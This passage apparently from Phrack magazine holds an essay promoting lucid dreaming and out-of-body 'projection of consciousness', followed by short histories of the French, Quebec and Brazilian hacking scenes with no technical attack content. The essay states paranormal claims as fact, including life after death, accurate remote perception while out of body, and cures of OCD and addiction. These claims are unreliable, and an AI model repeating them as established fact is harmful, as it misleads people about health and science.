following information is true - which we affirm - then it is
revolutionary. Being able to live outside your body means that death is
not the end, but only one step that we all have to pass through.


All these reasons make us think that publishing an article like this in
Phrack is a good idea. Because before being a computer hacking magazine,
phrack is dedicated to spreading occult, unrecognized and subversive
knowledge.


We let you discover and experiment by yourselves with these fantastic
phenomena that are lucid dreams and out of body projections, so that
you can form your own opinion.


Have a good read. 


The projection of consciousness 
by keptune 


Since ancient times, as far as we know, humankind has been animated by
the most impressive curiosity for almost everything, especially for this
strange thing that is the Mind: something concrete although impalpable to
the subject, yet invisible to the world. Some of the oldest carvings and
paintings that have been discovered in Africa are full of dream visions
and abstract symbols, most likely depicting shamanic inner travels.
However, it appears that the "power" to investigate how the mind works and
to retrieve pieces of information on consciousness and its mechanisms
was monopolized early in History by a few. Call them shamans,
sorcerers, wise men, etc., they gained a social position through the
ages by grabbing the exclusive rights to these investigations. Which might
have been wise at first, as the initiations to these practices were mostly
done from master to disciple in order to keep the teaching intact. But
indirectly, it has led the majority to be ignorant of these subjects,
almost fearful about the workings of consciousness and what could
modify it. When the time came for the brand new "modern science" to
study the Mind, during the XIXth century, some would have thought that
everything was about to change. But instead it was only the continuation
of the past traditions, albeit by fathering new ones: psychologists,
psychiatrists, neurologists. Nowadays, if you do not have at least a
master’s degree in one of these subjects, you are simply considered
ignorant about the mind by the scientists. That’s right, your own mind,
your consciousness. You are just not "authorized" to talk about it, or
you are mocked if you try, like a child who would try to build a
skyrocket - cute, but impossible. It is no more than another form of
monopoly, to control the main dogma of materialism in our society. It is
like saying that you are not intelligent enough to think about it, so
just do not try, serious people are doing it for you and will tell you
what to think and how to apprehend your own life. Meanwhile, just work,
consume and enjoy.


But guess what: these people, most likely unconsciously as they are being
"manipulated" too by the main dogma, just want to make you think that
you cannot know anything about the mind, your own consciousness,
without them. And that you would be a fool to try in spite of this
all-powerful fact. Which is just wrong. Seriously. In fact, you are the
one who is all-powerful over your own consciousness. But you must use it,
and bring it to unknown territories in order to understand it by yourself,
which is the only way. Some might be thinking at this point: my mind
is what it is, what is he talking about? Sometimes I am sad, or joyful,
but my mind stays the same beneath that. Well, wrong. You just did
not try to change it, to push it to its extreme. I am talking about
something with the same subjective difference as between physical reality
and a dream. Think Matrix, minus the glasses, the robots and the giant
killing computer. I am talking about a skill that anyone can develop:
projection of consciousness, one of the most amazing faculties of the mind.


What is projection of consciousness? Have you ever had a lucid dream? I
mean, dreaming and knowing that you are dreaming? Realizing that the world
around you is just an illusion created by your mind and that you did not
notice it at first? That is a type of projection of consciousness, the
lowest one in fact. You are projecting your mind out of the feeling
of your physical body, into another reality. Dreaming is a type of
projection of consciousness, although non-lucid dreams are the lowest of
the low, not very interesting for the real mind raiders. But it’s
a good bridge to some more serious projection activities. At this
point of the article, I know that some are already thinking: whatever,
dreams are not real. WRONG. That is a typical shortcut from the dominant
materialistic, so-called "scientific", dogma, which considers that all
that is not palpable is not real. Then your mind as a unity of perception
and consciousness is not real, because guess what, even the best EEG
cannot find where the mind sits in the brain (if it is in the brain at
all). All they do is record electrical signals here and there. For your
mind, the dream is as solid and real as physical reality. That is why
you wake up sweating from a nightmare, with your heartbeat at 200, and
still frightened for a few minutes. Or on the contrary, you wake
up with a feeling of completeness after a really amazing and beautiful
dream. Right? A dream is impalpable, but it is real nonetheless for the
observer, you. And now think about this: about one sixth of your life is
made of dreams. Almost an entire separate life, which most people just
disregard as unreal (=impalpable) and therefore uninteresting. That is
just sad, when you know all the amazing possibilities of the mind, which
can - and will - really transform your life by bringing your attention
to a whole new dimension. Something nobody has ever talked to you about,
I guess. Something that is still mostly undiscovered, where you are a
real pioneer.


If you have never even had a lucid dream, you are standing right now on
the first floor of a skyscraper, unaware that there is an elevator just
behind you that could bring you in no time to a flabbergasting landscape
and a whole new perspective. Seriously. You cannot know what your
mind, your consciousness, is made of unless you accept to explore it by
yourself. The modern scientific method tends to analyze from an outside
point of view, which just cannot lead to a full understanding. It would
be like trying to understand how your watch works without opening it up
at one time or another.


I guess many are thinking right now about shrooms, pot and crack, salvia
divinorum, entheogens, hallucinations etc. That’s the exact opposite of
what I am about to explain. You do not need anything more than yourself
(and hopefully your mind too) to project in full consciousness. Plants
have been used a lot by shamans to attain different levels of perception,
but nowadays it is very unlikely that you know a shaman who could
guide you into a safe practice using them. Taking some is therefore
not recommended for projection of consciousness, as you need to be
fully aware. Moreover, some might just think afterwards that it was all
hallucinations due to the drugs, which would ruin the whole point of
the experience.


So let us start. From my own experience (it is always important to speak
from experience on this subject and not from books or theories, even more
so as the point is to gain a first-hand knowledge of all this), there are
different levels of projection (the fact of putting your consciousness
out of the perception of the physical universe, into another form of
reality). From the lowest to the highest:


- dreams
- lucid dreams
- wake initiated lucid dreams
- full physical projection
- higher projections


Everyone knows dreams. Well, in fact some people never remember their
dreams, but everyone can after only a few days of training (thinking
hard about the last image in mind just after waking up, for example, is a
good way to progressively remember full dreams). I won’t talk about it
here as everyone can achieve this state quite easily.


A lucid dream is a type of dream that not everyone has experienced, or
for some only a few times. It is dreaming and realizing that something
is wrong, and eventually that you are in a dream. It opens up a whole
new perspective on dreaming: have you ever thought of controlling the
whole universe? Well, with some training, you can in lucid dreams. It
is also a place to meet solidified parts of your psyche, your
subconscious. Characters become interfaces with deeper parts of your
mind. You can retrieve old or lost information or interact with your
own mind by creating psychic anchors through them. You are as if inside
your own mind, I mean really inside: the universe around you is
a symbolic, materialized form of what you thought was so impalpable
in the waking state. You can go down to the lowest levels of your mind
"programs" (i.e. your personality etc.) and modify them. Or you can just
create your own worlds, and enjoy the landscapes, the "people" you meet
(parts of you in fact, with sometimes what seems to be a real kind of
independent behaviour and a proto-mind of their own). Something I have
been experimenting with lately is merging with the strongest "people"
(parts of my psyche) that I encounter. I just ask to merge and our bodies
melt into one. It is a really amazing experience each time, and I gain a
lot of knowledge that I did not think I had. It is like reunifying my
mind little by little. Well, the possibilities are almost limitless, so
just think about anything you would like to do, and you can! It is also
a good place to face mental blocks and fight them. The result in physical
life is real if you win. Some have destroyed their OCD in this state,
others have gained enough willpower to stop drugs or take control of
their lives etc.


Becoming lucid for the first time can however be something of a
challenge. Fortunately, many types of training have been developed. Here
are a few. I encourage you to google these for more information
and techniques:


- Make your watch beep every x minutes. It can be quite annoying for other
people though. However, this beep will progressively be integrated by your
subconscious mind and will start to appear in your dreams after a week or
two. What you must do (in physical reality) is check your surroundings
every time your watch beeps. Do this seriously, it is really important to
get totally involved in this verification of reality. Try to remember
your whole day, and the past days, looking for chronological problems
etc. Do not assume that you are in physical reality, but really imagine
that you might be dreaming. If you realize that there is a problem, well,
congratulations, you are having a lucid dream now.


- Do some reality checks the same way when you see something strange, or
on the contrary (which might work better for some) when you do something
really basic, like washing your hands or opening a door. Do it each time
for a few days or weeks, and very seriously (for at least one minute). You
will become lucid if you try this while dreaming after it becomes a habit
(as it will be integrated by the subconscious mind).


- Before you go to sleep, while lying in your bed, feel the world
around you, feel that you are lucid, fully aware of yourself. Repeat a few
times "I WILL be lucid tonight, I WILL be lucid tonight..." while holding
the feeling of lucidity. Do this until you fall asleep if you want.


Once you become lucid in a dream, stay calm and enjoy. Repeat out loud
every five seconds that you are lucid (to avoid losing your lucidity and
being caught back into a normal dream); it will help you stay in this
state. You can try to fly to move more easily around your created
universe (lifting your legs and even moving your arms as if you were
swimming might help at first), but do not try harder stuff like going
through walls, teleporting or creating big objects from nothing before
you have enough experience to stabilize your dream entirely. Indeed, the
mind does not like lucid dreaming at first, and it will try either to wake
you up or to make you lose your lucidity. In the first case, if you feel
that the dream is losing consistency and the image is disappearing,
concentrate very hard on your five senses: touch the ground, look closely
at some details etc. This will help to get you back into the dream, but
you might lose a lot of mental energy doing so, so actively repeat that
you are lucid after that, otherwise you might lose your lucidity
entirely. In the second case, the mind will typically try to catch you
back into a scenario: a naked member of the opposite sex (or the same,
depending on your sexual preferences) might appear, someone will tell you
that something has happened to your house, a giant dinosaur might start
chasing you etc. Anything that would get you involved in the dream will
be used, so do not get caught and stay focused!


If you have imagination and willpower (which I am sure is the case),
you will see changes in your everyday life and personality within a matter
of weeks of practice. Your centers of interest might change, as well
as what you feel is important in life, so stay aware of your needs and
aspirations. However, this kind of dream initiated lucid dream is still
not as powerful as a "full" lucid dream.


What I mean by full lucid dream is a dream initiated from the waking
state. Ok, some might think that dreams can only be initiated from
this state, as we go to sleep etc. But do you ever remember the exact
instant when you enter your dream? And moreover, being fully aware
during the whole process? It is a really flabbergasting experience
the first few times. It is like being suddenly propelled into another
world. If you thought dreams appeared slowly, that is far from reality,
as the transition from your black mind vision to the full-colored and
3D dream takes no more than a second. You suddenly feel a new body,
in a whole new world surrounding you. The experience of a WILD
(Wake Initiated Lucid Dream) is extremely joyful and what one would
call "real". Apart from what is happening (you are flying etc.) the
world seems as real and solid as the physical world would. But it is
more of an Alice in Wonderland thing going on. Doing a WILD is a bit
more tricky than a dream initiated lucid dream, but fortunately nothing
impossible. One technique that is very effective is visualizing
(=imagining and feeling) yourself walking in a known place (a mall,
a street in your neighbourhood etc.). I think that it is important to
visualize some place you know (and not an imaginary one) as this will
[...] a lot of what you see in this state. For example, this happened to
me a few years ago: it was early in the morning and my girlfriend left
the bedroom, to take a shower or eat her breakfast I thought. However I
was very tired and soon got back into a very deep relaxed state. I pushed
my consciousness forwards and found myself hovering above my body,
fully aware. I floated through the room, then through the door, the hall,
another door, and eventually was in the living room. I was surprised to
see that my girlfriend was sleeping in a foetal position on one of the
sofas, in its left corner, her face against the back and my coat (which
I had left in the hall) as a blanket. I felt a powerful force sucking me
back inside my body at this point. I immediately checked what I had seen:
everything, down to the slightest detail, was correct. This kind of thing
has happened to me a lot since then. You do not have to be religious,
or even believe in life after death to have this experience. Just try
it before you make your own judgement, but give it a try at least.


As you read in the experience I shared just above, I did not project
physically from within a lucid dream. Indeed you can project from a
fully conscious state too, which is even more powerful. If you want to
learn more about these techniques, I suggest you buy some books about
this subject, like the trilogy by Robert A. Monroe, a classic written
during 30 years of experimenting by an electrical engineer who found
himself projecting without even willing it. There are many good books out
there. However, projecting from a fully aware state is much more difficult
(but feasible of course), so be prepared to spend some time in training
(usually a conscious projection can be attained in a few days for the
gifted to a few months for the ungifted, like I was).


It seems that there are higher states of projection, apparently in some
all-mental levels, but in an objective, all-mental, universe. I have
yet to get into these, but hopefully some of you will get there in a
few years. Let the community of projectors of consciousness know your
discoveries at that time, as it is all about sharing. Indeed, projecting
your consciousness is even more than a life-changing experience, it is
a matter of protecting your freedom, your freedom to exist as a mind and
a body, and to use both to their extreme limits, and even beyond. No one
can take that from you, even locked in the smallest and deepest prison
of all. It is not even about believing, it is about trying by yourself
to push your limits out of the ordinary, out of the known into mostly
or fully unknown territories, and discovering your true nature in doing
so.


See you in other levels of consciousness. 


K.


International scenes


By Various


various@nsa.gov


More or less 10 years after the last "International scenes" in
phrack 48, the resurrection arrives. The purpose of this article
is to present the hacking/cracking/phreaking scenes of different
countries. This article is not written by a single person but by
people from all these different countries. That is why we ask you
to send us descriptions of your scenes. It could be about groups,
busts, technologies, great hackers or anything you think is
interesting.


There was once a time when hackers were basically isolated. It was 
almost unheard of to run into hackers from countries other than the 
United States. Then in the mid 1980’s thanks largely to the 
existence of chat systems accessible through X.25 networks like 
Altger, tchh and QSD, hackers world-wide began to run into each other. 
They began to talk, trade information, and learn from each other. 
Separate and diverse subcultures began to merge into one collective
scene, which has brought us the hacking subculture we know today. A
subculture that knows no borders, one whose denizens share the common 
goal of liberating information from its corporate shackles. 


With the incredible proliferation of the Internet around the globe, this
group is growing by leaps and bounds. With this in mind, we want to help
further unite the communities in various countries by shedding light
onto the hacking scenes that exist there. If you want to contribute a
file about the hacking scene in your country, please send it to us
at phrack@well.com.


This month we have files about the scenes in France, Quebec and Brazil.


A personal view of the french underground [1992-2007] 


by Nicholas Ankara 


The french scene has evolved a lot since the 1980’s. Before 1993, there
was no internet provider in France, which explains why the hacking scene
in France was mostly focused on phreaking and hardware-related
hacking before this date. The first ISP (Worldnet) was founded by an
influential hacker known as NeurAlien. I am not sure that his identity
was public knowledge at the time, but I don’t think I’m taking too
many risks by revealing this.


NeurAlien was also the founder of what is known to be the first french
electronic ezine about hacking, widely known as NoWay. NoWay started to be
published in 1992 and did not deal so much with Internet hacking as
with hacking on the MiniTel network. MiniTel is the ancestor
of the Internet in France, and its use seems to explain the late
adoption of the Internet in this country. However, MiniTel was extremely
slow and expensive, which incited a large amount of hacking to
develop around it. NeurAlien wrote many philes about minitel hacking at
that time, most of them published in NoWay. He also participated
in the writing of an International Scene article in Phrack #46 where he
explained the early hacking movement in France.


NoWay inspired a lot of french hackers in the 90’s, and many other ezines,
such as NoRoute, were born after NoWay stopped publication, around
1994. NoRoute was (afaik) the first french ezine dealing with Internet
hacking as a main topic. Unlike NoWay, NoRoute was written by multiple
authors, who later proved to be highly skilled hackers,
since some of them founded one of the most influential international
hacking groups of the 90’s, known as ADM (Association De Malfaiteurs,
which could be translated as ’Criminals Association’). That same group,
under additional influences, gave new life to the antisecurity movement
in the early 2000’s, by creating public web forums to justify the
non-disclosure of exploit software.


Affiliated with these people, another old school hacker named Larsen
pioneered Radio Hacking in France. Larsen founded the CRCF (Chaos
Radio Club of France), whose research was compiled into an ezine
called HVU. HVU gave lots of information about frequencies used by
various services in France, including the police and other military
groups of the country. Unfortunately, Larsen got busted later on, as
he was leaving his home by bicycle, by armed authorities who
considered him a terrorist, while he was just a happy hacker making
no profit from his research. After this episode, it got more difficult
for him to continue underground activities related to this topic; more
precisely, it was way more difficult to publish about it under the threat
of a new so-called antiterrorist raid. This story reflects without any
doubt the total incomprehension between hackers and the national services
of the country. For these reasons, it is more and more difficult to find
contacts in publicly known meetings such as the 2600-fr, which happens in
Paris every month.


Another major underground ezine that stood out for its technical quality
was MJ13 (Majestic13). It was mostly written by French hackers who were
also students at renowned French computer science universities. MJ13
contained material about virii, cracking, hardware hacking, and other
related topics, but ceased publication after only 4 issues. There were
also attempts to group hackers for legal reasons (as in creating a kind
of hackers’ syndicate) by the Hacker Emergency Response Team (HERT),
founded by Gaius. Gaius (ACZ) was a French hacker of the early 90s
renowned for his social engineering hacks into FBI and CIA telephone
networks. Surprisingly, he never got jailed, but at some point he had to
leave the country, officially to escape the authorities. HERT was never
a hacking group but included a lot of hackers from other international
groups such as ADM, w00w00, TESO, and others.


As already stated, a major burden that has always made the French hacking
scene suffer was the omnipresence of the French secret service (DST:
Direction de la Surveillance du Territoire) and its determination to
infiltrate the French hacking scene by any means. A good example of this
was the fake hacking meeting created in the mid-1990s, called the CCCF
(Chaos Computer Club France), where a lot of hackers got busted with the
active participation of a renegade hacker named Jean-Bernard Condat.
Since that time, the French hacking scene has been deeply harmed and a
very suspicious atmosphere has reigned for more than 10 years. Most of
the old school hackers decided to stop contributing to the scene, which
went even more underground to avoid infiltration by the services.


As the Internet was getting democratized in the late 90s, a new generation
of hackers, ignorant of what happened with the CCCF, started to recreate
a public face for the French hacking scene, and new phreaking and hacking
groups started to create new influential ezines. The most renowned new
school phreaking ezine was called Cryptel, but it had to cease publication
because of major busts at the beginning of the 2000s. A lot of other
ezines were born from inexperienced hackers, but most of them were ripped
from existing material or were of very poor technical quality, which
makes them not worth mentioning any further.


During the late 90s and early 2000s, other groups such as RTC created
an ezine which dealt mostly with network oriented hacking, but ceased
publication after a few issues. Another group was created under the name
Exile, which brought together young French, Canadian, and Belgian
hackers. This group started out inexperienced but soon got quite a
reputation by writing a lot of highly technical articles for various
ezines such as the Quebec magazine IGA, and later for Phrack. As the
group evolved into another one under the name Devhell, their articles
about new exploit techniques and reverse engineering never got into a
dedicated ezine. There was once an attempt to create such an ezine, but
the difficulty of finding serious collaborators made it impossible.


Last but not least, an international group of (partly French)
highly skilled hackers known as Synnergy Networks was created in the
early 2000s. This group became well known by publishing exploit software
that was seemingly very hard to write (such as the first publications of
heap overflow exploits) and by writing reference articles about the
subject, some of them published in Phrack Magazine. Just as with the
other groups mentioned, it is very hard for a non-hacker to know if those
groups are still active, because of their closed-door nature by default
and the absence of any up-to-date information about them on the web. It
is safer for everyone serious about hacking to stay low-profile, to avoid
miscellaneous troubles and keep the necessary freedom in their
activities. Nevertheless, it can be mentioned without fear that hacking
is not closed to a given group, and the most active hackers in each group
collaborated at some point to create a stronger manpower in order to face
the commercialization of computer security and the increasing difficulty
of successful computer network intrusions.


The French underground is also very active in the field of software
cracking, and many very skilled French crackers are still active. Just
like their hacker alter egos, French crackers learnt to stay very paranoid
about their activities to avoid getting busted, and for this reason I will
not mention any names of groups or persons active on that topic. Actually
I may be able to quote only one young group of reverse engineers who
slightly overlap with the cracking community: the French Reverse
Engineering Team (FRET). FRET holds a public forum on the topic of reverse
engineering and none of their activities appear to be illegal. This forum
serves as an educational place for the young generation of coders to
learn low-level information about closed-source software.


There were also a lot of other groups, but I would not define them as
hacking groups, as most of them were created by beginners or by
profit-oriented associations for reasons other than fun with hacking.
Generally, those groups did not help to renew the hacking underground
mindset and thus do not have a place in a file about the French
underground history. The underground exists and remains very active. It
is up to each hacker to enter the underground by providing material to
other hackers. Hacking is not about disclosure of exploits or
fame-seeking on public forums or mailing lists. It is about having fun by
learning what you are not supposed to learn. Because of this, the
underground will always exist, even if no trace of it remains on the WWW.


The Quebec scene


by g463 


Yesterday 


NPC (Northern Phun Co.) is believed to be the first hacking and phreaking
group in the history of the Quebec scene. One of their members, known as
Gurney Halleck, has already written about the 418 scene in the
"International scenes" article in Phrack 44. NPC released a bunch of good
quality ezines from 1992 to 1994 about phreaking, hacking and anarchy.


Active around 1994 to 1997, the second big hacking and phreaking group was
C-A (Corruption Addicts). This group was pretty active back then and had
a reputation for blackhat activities. They hacked high profile
organizations, such as the GRC, FBI, SCRS, DND and 11 banks, like the
National Bank of Canada.


After C-A dissolved, two other groups took the lead of the Quebec scene
around 1995, Total Control and FrHack. Both published a couple of ezines.
Then, around 1998, these groups left the scene, and at the same time they
made room for Pyrofreak and IGA.


In 2000, sector_x was reborn. The goal of this group was to bring the
best hackers that the province of Quebec had to offer under the same
roof. The idea was great, but ultimately, it failed. There were a lot of
really good conversations and interesting exchanges between people, but
there were no concrete and constructive projects at all. In fact, this
has always been one of the major problems of the Quebec scene.


Today, the Quebec scene still exists even though it has changed a lot
over the last years. The rapid growth of the Internet has made meeting
people a lot easier than before, and it helped the community to grow
larger. Consequently, a lot of people, such as computer geeks, technology
enthusiasts, gamers and web programmers, began to hang around hacker
groups. As of today, there are still a couple of hackers left in the dark
corners of the Quebec scene, but you need to scratch the surface a little
bit to find them.


Mindkind is one of the few hacking groups that still release ezines on a
regular basis. They have their own particular style of writing, which
could be described as eccentric and delirious. To date, they have
published 10 ezines, talking about different subjects such as phreaking,
hacking and philosophy. Through the years, many people joined this group
and a lot have also left, but the same group of fanatics remains to keep
the group alive.


The new millennium has also brought a lot of meetings, conventions and
get-togethers. Among those events, there were the Hackfests, organized by
the Centinel. Hackfests are conventions on hacking that last a full
weekend and are hosted at Laval University, in Quebec City. A few dozen
hackers meet during this time to hack, learn and of course party. On the
schedule, there are various activities, such as hacking contests,
conferences and wargames, with a nice musical ambiance provided by the
31337radio internet talk show.


The 2600 group also has its meetings in Montreal. On the first Friday of
every month, a small group of computer freaks meets in downtown Montreal
to talk about different subjects such as computers and electronics. Among
those conversations, you can sometimes hear some interesting discussions
about computer security.


There is also the famous reverse engineering conference better known as
Recon, which takes place in Montreal. This event is organized by three
Quebecers who are passionate about reverse engineering and security. This
conference has had a lot of good and highly skilled speakers in the past.
The next conference is planned for 2008.


Finally, over the last couple of years, the corporate world has changed a
lot of things in the Quebec scene. Now, some hackers are getting paid to
do what they love to do. Consequently, this movement altered the
motivation of a lot of hackers over time. I still think it’s possible to
stay true to your roots even if you earn your living this way, but too
many people are getting corrupted by the money. Also, a lot of
opportunists, with absolutely no knowledge of hacking and security, are
attracted by the easy money you can make in the corporate world of
security, but this is another story.


To my knowledge, one of the first busts to happen in Quebec was back in
April 1993. Coaxial Karma, from NPC, was arrested for hacking into a
VAX/VMS cluster of Laval University. He pulled this off by brute forcing
usernames and passwords. Then an administrator saw the logs by chance and
called the police. Since he was a juvenile at that time, he got off quite
easily.


On June 8th 1998, three members of C-A got arrested. They got charged with
possession of password lists, possession of bomb recipes and hacking. Two
people got away with it, but phaust, the founder of the group, was
sentenced to 12 months of community service and placed on probation for 12
months.


Back in February 2000, one of the most publicized denial of service
attacks happened. I don’t think it’s an exploit that the Quebec scene
needs to remember, but it’s still something important that needs to be
talked about.


Mafiaboy was the individual who performed those denial of service attacks
against high profile corporations such as Yahoo, Amazon, Dell, eBay and
CNN. After bragging about it on IRC, he got the attention of the
authorities. In September 2001, he was sentenced to eight months of open
custody, one year of probation, restricted use of Internet and a small
fine.


PHRACK INTERNATIONAL SCENE ON BRAZIL 


by sandimas 


Since the last ’Phrack International Scene on Brazil’, more than a
decade ago, there have been lots of changes in hacking in
‘coconut land’. Here is a very brief historical retrospective
on the evolution of the Brazilian hacker scene.


[ -- The initial mark 


Back at that time, Internet access in Brazil was restricted to
academics or rich people. The BBS scene was quite popular and still
existed. The very beginning of the scene developed in this
environment, although there is little information and documentation
about this time.


In 1995, when Embratel (our AT&T) authorized commercial access to the
net, there was the kickstart of a rehearsal for a more robust hacker
scene. In this same year the first Brazilian hacking e-zine, called
Barata Eletrica, appeared; although lame, it can be considered the
real initial mark of the scene in Brazil.


[ -- Heading to a more robust scene 


In subsequent years, due to lower prices of equipment, there was
a significant expansion of hacking in the country. Many people and
groups got together to exchange knowledge and spread it through many
e-zines. Although not all publications were that good and hackers
were not that skilled, these people helped to pave the road to an
even larger scene. It was the most active time Brazilian hacking has
ever seen.


[ -- 1999: The rise of the script-kiddies


At the end of the 90s, hacking achieved a "pop" status in Brazil. Being
a hacker was "cool". Without much knowledge you could brag and boast
to your friends and impress chicks. With half a dozen public exploits
you could break into computers belonging to the government and other
high-profile targets. The (always) uninformed media gave so much
attention to these ’hackers’ that it was easy to get your nickname on
the most-watched TV news or in major newspapers and magazines.


This trivialization drew the attention of the authorities, and
anti-hacking laws were drafted, but they never got through. And, going
with the flow, many computer security firms were created. Some kids who
had grown up in the early underground scene went corporate and created
their own companies. But there were also many other companies that took
advantage of the fear spread by the media and increased their stock
market shares by selling lies and offering snake-oil consultancy.


Needless to say, in these Dark Ages little or no worthwhile knowledge was
produced and published for the national scene.


[ -- ...and everything after 


Just like after the Dark Ages, we also had our Age of Enlightenment,
shedding light on the Brazilian scene. New groups, a bunch of new people
and mailing lists committed to studying and experimenting with new
horizons of computing were formed, quite good papers and tutorials in
Portuguese were published, and a scene seemed to be flourishing again,
even with strange highs and strange lows.


After a few years of almost nothing interesting occurring here we had 
Hackers 2 Hackers Conference I in 2004, the very first hacker conference 
held in Brazil. H2HC is now moving toward its fourth edition and getting 
better every year. 


Currently in Brazil we have two or three well known teams and a bunch of
skilled people getting along in close-knit circles. We also have two active
e-zines: MOTD Guide, aimed at beginners, and The Bug! Magazine, with more
sophisticated articles oriented toward people with medium level skills.


[ -- Few words about phone phreaking in coconut land 


There is no phreaking in Brazil. Period. In the late 90s we had only two
serious groups, a few hangers-on who used to blue box, a guy called Tom
Waits and a magazine called Brazilian Phreakers Journal dedicated to
phone phreaking, but they are dead and gone now.


Apart from some tricks to make free phone calls and calling card abuse, 
there seems to be no real phreaking here. Our phone system has been kept 
secret for many years and no one really understands it deeply. 


